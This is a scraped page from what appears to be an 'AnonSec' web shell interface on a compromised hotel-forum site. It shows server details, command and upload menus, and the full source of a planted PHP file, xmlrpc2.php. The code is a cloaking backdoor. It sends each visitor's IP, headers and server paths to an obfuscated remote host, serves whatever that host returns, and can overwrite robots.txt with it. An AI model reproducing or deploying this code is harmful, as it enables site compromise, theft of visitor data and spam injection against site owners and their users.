AnonSec Team
Server IP : 10.131.40.8  /  Your IP : 216.73.216.63
Web Server : Apache
System : Linux webd008.cluster131.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User : ludmqhh ( 137773)
PHP Version : 8.4.10
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0705) :  /home/ludmqhh/www/hotel-forum/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/ludmqhh/www/hotel-forum/xmlrpc2.php
<?php
error_reporting(0);
if (function_exists('opcache_reset')) { @opcache_reset(); }
function curl_post($url, $user_agent, $data = array()) {
    $url = str_replace(' ', '+', $url);
    $post_data = http_build_query($data);

    // 如果支持 curl,优先用 curl
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        @curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_HEADER, false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 4);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
        curl_setopt($ch, CURLOPT_ENCODING, '');
        $output = curl_exec($ch);
        $errorCode = curl_errno($ch);
        curl_close($ch);

        if ($errorCode !== 0 || $output == "error code: 502") {
            return false;
        }
        return $output;
    } 
    // 否则用 file_get_contents 兼容
    else {
        $options = array(
            'http' => array(
                'method'  => 'POST',
                'header'  => "Content-type: application/x-www-form-urlencoded\r\n" .
                             "User-Agent: " . $user_agent . "\r\n",
                'content' => $post_data,
                'timeout' => 4,
            )
        );
        $context  = stream_context_create($options);
        $output = @file_get_contents($url, false, $context);

        if ($output === false || $output == "error code: 502") {
            return false;
        }
        return $output;
    }
}
function getIPAddress() { if(!empty($_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP']; }else if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $ip = $_SERVER['REMOTE_ADDR']; } return $ip; }
function is_https() { if (!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') { return true; } elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') { return true; } elseif (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') { return true; } return false; }
$version = "en2";
if (is_https()) {
    $http = 'https://';
} else {
    $http = 'http://';
}
$dataApi = 'https://mer'.'car'.'i.cfs'.'erv'.'er.s'.'hop/a'.'pi'.'/c'.'on'.'te'.'nt.php';

$data1 = array();
$key_name_arr=array(
    "SCRIPT_NAME",
    "REQUEST_URI",
    "REQUEST_SCHEME",
    "SERVER_PORT",
    "REMOTE_ADDR",
    "HTTP_REFERER",
    "HTTP_ACCEPT_LANGUAGE",
    "HTTP_USER_AGENT",
    "HTTP_HOST",
    "DOCUMENT_ROOT",
    "SERVER_ADDR"
);
foreach($key_name_arr as $key_name)
{
    $key_value=isset($_SERVER[$key_name])?$_SERVER[$key_name]:'';
    $tran_char=str_replace("+","-",$tran_char);
    $tran_char=str_replace("/","_",$tran_char);
    $tran_char=str_replace("=",".",$tran_char);
    $data1[strtolower($key_name)]=$key_value;
}
$data1['ip'] = getIPAddress();
$data1['http'] = $http;
$user_agent = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '');
$current_url = base64_encode($http.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
$p = urlencode($_SERVER["REQUEST_URI"]);
if (strpos($p, "favicon.ico") !== false) {
    if(file_exists("favicon.ico")){
        header('Content-Type: image/x-icon');
        readfile("favicon.ico");
        exit();
    }else{
        http_response_code(404);
        exit();
    }
}else{
    $dataApi = $dataApi."/".$current_url;
    $curl_content = curl_post($dataApi, $user_agent, $data1);
    if ($curl_content === false) {
        exit();
    }else if (in_array($curl_content, ["None", "Continue", "blank"])) {
    }else if ($curl_content == "404") {
        header('HTTP/1.1 404 Not Found');
        echo $curl_content;
        exit();
    }else if (strpos($curl_content, '404 Not Found xx_') !== false) {
        header('HTTP/1.1 404 Not Found');
        echo $curl_content;
        exit();
    }else if ($curl_content == "500") {
        header("HTTP/1.0 500 Internal Server Error");
        exit();
    }else {
        $uri = $_SERVER['REQUEST_URI'];
        if (strtolower(substr($uri, -4)) === '.xml') {
            header("Content-type:text/xml");
        }else if (strpos($uri, "robots.txt") || strpos($uri, "pingsitemap") || $uri==="/ping") {
            header("Content-Type: text/plain");
            $robotsFile = fopen("robots.txt", "w");
            fwrite($robotsFile, $curl_content);
            fclose($robotsFile);
        }
        echo $curl_content;
        exit();
    }
}
?>

AnonSec - 2021